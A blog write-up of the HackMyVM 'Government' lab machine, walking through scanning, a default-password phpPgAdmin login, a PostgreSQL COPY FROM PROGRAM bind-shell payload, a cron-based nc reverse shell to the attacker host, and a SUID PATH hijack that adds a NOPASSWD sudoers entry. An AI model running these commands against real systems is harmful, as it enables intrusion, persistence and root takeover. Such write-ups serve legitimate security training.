HackMyVM - Government

https://hackmyvm.eu/machines/machine.php?vm=Government

A big thank you to OxJin for creating this well written machine, there are hints on the journey but there are also quite a lot of distractions to ignore.

Government is a medium difficulty machine, write-ups do not capture the frustration of not knowing exactly what the next step is and there is quite a lot of extra content (ports, directories, files etc) to distract you from knowing what the next step should be, I have only included the required steps and obfuscated passwords.

Find it

┌──(kali㉿kali)-[~/government]

└─$ sudo netdiscover -r 10.0.0.0/24 -P 127 ⨯

[sudo] password for kali:

_____________________________________________________________________________

IP At MAC Address Count Len MAC Vendor / Hostname

-----------------------------------------------------------------------------

10.0.0.1 08:00:27:1f:ab:fd 1 60 PCS Systemtechnik GmbH

10.0.0.40 08:00:27:23:75:82 1 60 PCS Systemtechnik GmbH

-- Active scan completed, 2 Hosts found.

Scan it

┌──(kali㉿kali)-[~/government]

└─$ nmap -T4 -sC -sV -oN nmap.out 10.0.0.40

Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 09:24 EST

Nmap scan report for 10.0.0.40

Host is up (0.00090s latency).

Not shown: 993 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| drwxr-xr-x 2 0 0 4096 Sep 01 15:59 files

| drwxr-xr-x 2 0 0 4096 Aug 31 12:33 government

|_drwxr-xr-x 2 0 0 4096 Nov 14 16:20 news

| ftp-syst:

| STAT:

| FTP server status:

| Connected to ::ffff:10.0.0.10

| Logged in as ftp

| TYPE: ASCII

| No session bandwidth limit

| Session timeout in seconds is 300

| Control connection is plain text

| Data connections will be plain text

| At session startup, client count was 2

| vsFTPd 3.0.3 - secure, fast, stable

|_End of status

22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)

| ssh-hostkey:

| 2048 0b:95:9a:37:ae:d8:b0:c0:23:78:eb:04:c2:9b:6c:41 (RSA)

| 256 d4:a1:3b:a7:cc:e2:ea:ee:2e:6b:91:36:f9:be:da:6f (ECDSA)

|_ 256 22:9f:42:60:3d:56:20:15:3a:ff:7c:19:0d:20:ca:7a (ED25519)

80/tcp open http Apache httpd 2.4.25 ((Debian))

| http-robots.txt: 2 disallowed entries

|_/login.php /admin

|_http-server-header: Apache/2.4.25 (Debian)

|_http-title: Site doesn't have a title (text/html).

111/tcp open rpcbind 2-4 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2,3,4 111/tcp rpcbind

| 100000 2,3,4 111/udp rpcbind

| 100000 3,4 111/tcp6 rpcbind

| 100000 3,4 111/udp6 rpcbind

| 100003 3,4 2049/tcp nfs

| 100003 3,4 2049/tcp6 nfs

| 100003 3,4 2049/udp nfs

| 100003 3,4 2049/udp6 nfs

| 100005 1,2,3 42561/tcp6 mountd

| 100005 1,2,3 43735/udp mountd

| 100005 1,2,3 53635/udp6 mountd

| 100005 1,2,3 56847/tcp mountd

| 100021 1,3,4 34341/tcp nlockmgr

| 100021 1,3,4 38727/tcp6 nlockmgr

| 100021 1,3,4 44586/udp nlockmgr

| 100021 1,3,4 60655/udp6 nlockmgr

| 100227 3 2049/tcp nfs_acl

| 100227 3 2049/tcp6 nfs_acl

| 100227 3 2049/udp nfs_acl

|_ 100227 3 2049/udp6 nfs_acl

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

2049/tcp open nfs_acl 3 (RPC #100227)

Service Info: Host: GOVERNMENT; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

|_clock-skew: mean: -19m59s, deviation: 34m37s, median: 0s

|_nbstat: NetBIOS name: GOVERNMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

| smb-os-discovery:

| OS: Windows 6.1 (Samba 4.5.16-Debian)

| Computer name: government

| NetBIOS computer name: GOVERNMENT\x00

| Domain name: \x00

| FQDN: government

|_ System time: 2021-11-15T15:25:12+01:00

| smb-security-mode:

| account_used: guest

| authentication_level: user

| challenge_response: supported

|_ message_signing: disabled (dangerous, but default)

| smb2-security-mode:

| 2.02:

|_ Message signing enabled but not required

| smb2-time:

| date: 2021-11-15T14:25:12

|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 14.68 seconds

Quite a few ports open, but always worth seeing if nikto identifies anything on http.

┌──(kali㉿kali)-[~/government]

└─$ nmap -T4 -sC -sV -oN nmap.out 10.0.0.40 nikto -h http://10.0.0.40

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.40
+ Target Hostname:    10.0.0.40
+ Target Port:        80
+ Start Time:         2021-11-15 09:48:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ 7891 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-11-15 09:49:02 (GMT-5) (58 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Website - no significant content other than to imply there is a database in the backend

anonymous

FTP - files with old passwords and usernames and a note about changing the encryption.
Robots.txt also has some entries as noted in nmap scan.

looking at /phppgaadmin identified by nikto I started looking at the field names in order to setup password guessing with hydra, but happened to guess the password manually whilst I was looking at it on the second try.
The default username is postgres and after capturing a few password requests to setup hydra dictionary attach I tried the password as admin and it worked, a happy accident!

From phPgAdmin SQL commands can be executed through the web interface and an RCE exploit a can be used to get a shell as the user 'postgres'.

DROP TABLE IF EXISTS hackmyvm; -- [Optional] Drop the table you want to use if it already exists
CREATE TABLE hackmyvm(cmd_output text); -- Create the table you want to hold the command output
COPY hackmyvm FROM PROGRAM 'nc -nvlp 2346 -e /bin/bash'; -- Run the system command via the COPY FROM PROGRAM function

┌──(kali㉿kali)-[~/government]

└─$ nc 10.0.0.40 2346 127 ⨯

# python3 -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'

postgres@government:~$

As I was working on the server for a long time I did setup a crontab to reconnect if I closed the terminal (as postgres can take a long time to recover and timeout )

postgres@government:/dev/shm$ echo "#!/bin/bash">/dev/shm/test.sh

postgres@government:/dev/shm$ echo "nc -e /bin/sh 10.0.0.10 4444">>/dev/shm/test.sh

postgres@government:/dev/shm$ echo "* * * * * /dev/shm/test.sh"|crontab -

Escalate to User

With a shell it is apparent there is only a single user 'erik' and 'root', there didnt appear to to be any exploitable binaries or services so a search for credentials appeared to be required.

there is a hidden file in /var/log that can be found ( I did use linpeas.sh to scan and it found it for me)

(extract from linpeas.sh output)

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)

-rw-r--r-- 1 root root 432 Sep 1 16:55 /var/log/.creds.log

-rw------- 1 root root 0 Nov 15 15:22 /var/lib/nfs/.xtab.lock

-rw------- 1 root root 0 Nov 15 15:22 /var/lib/nfs/.etab.lock

-rw-r--r-- 1 root root 0 Nov 17 10:59 /run/network/.ifstate.lock

-rw------- 1 postgres postgres 69 Nov 17 12:55 /run/postgresql/.s.PGSQL.5432.lock

-rw-r--r-- 1 root root 220 May 15 2017 /etc/skel/.bash_logout

-rw------- 1 root root 0 Aug 30 19:48 /etc/.pwd.lock

postgres@government:/var/log$ cat .creds.log

##WARNING##

//This file contain sensitive informations!!

/////////////////////////////////////////////////////////////

244fff13bf3c5f471e0e6bf7900945936cf1354dfea15130

////////////////////////////////////////////////////////////

key: Tr770f1NdMy1mP0sSibl3P4sSw0rD,7iK3****

////////////////////////////////////////////////////////////

IV: 5721370743022037

////////////////////////////////////////////////////////////

#WARNING#

postgres@government:/var/log$

After spending far to much time trying to work out what Python script had created it and couldnt.
It would have helped if I remembered a hint from the FTP files...

There is a decrypt tool on CyberChef.

Escalate to Root

erik@government:~$ find . -perm -4000 -exec ls -al {} \; 2>/dev/null

-rwsr-sr-x 1 root root 8800 Aug 31 18:28 ./backups/nuclear/remove

erik@government:~$ cd backups/nuclear/

erik@government:~/backups/nuclear$ ls

file.txt git.txt nuc.txt remove

erik@government:~/backups/nuclear$

There is an executable called remove with SUID set (execute as the file owner, root) - lets see what it does...

erik@government:~/backups/nuclear$ ./remove

Error: Please enter a program to time!

erik@government:~/backups/nuclear$ ./remove nano

sh: 1: time: not found

note the source code for this is on the server at /usr/share/doc/libssl-doc/demos/bio/remove.c:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
char command[256];

if(argc != 2) {
printf("Error: Please enter a program to time!\n");
return -1;
}

memset(&command, 0, sizeof(command));

strcat(command, "time ./");
strcat(command, argv[1]);

system(command);
return 0;
}

The program takes an argument and is supposed to time how long it takes to execute.
So just need to convince it to run something we want - again there are multiple methods to do this but this but this is the one I picked:
Add the local path to the PATH environment so it can find my "time" program to run.

Write a simple script I want to run as root and give it execute rights.
I can then just run it with any argument as I am just looking to run a custom "time" script.

erik@government:~/backups/nuclear$ echo $PATH

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

erik@government:~/backups/nuclear$ export PATH=./:$PATH

erik@government:~/backups/nuclear$ echo $PATH

./:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

erik@government:~/backups/nuclear$ nano time

erik@government:~/backups/nuclear$ cat time

echo "erik ALL=(ALL) NOPASSWD: ALL" >/etc/sudoers.d/erik

erik@government:~/backups/nuclear$ chmod 777 time

erik@government:~/backups/nuclear$ ./remove something

uid=1000(erik) gid=1000(erik) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth),1000(erik)

erik@government:~/backups/nuclear$ sudo -l

Matching Defaults entries for erik on government:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User erik may run the following commands on government:

(ALL) NOPASSWD: ALL

erik@government:~/backups/nuclear$ sudo su

root@government:/home/erik/backups/nuclear#

Search This Blog

Tinkering in the shed.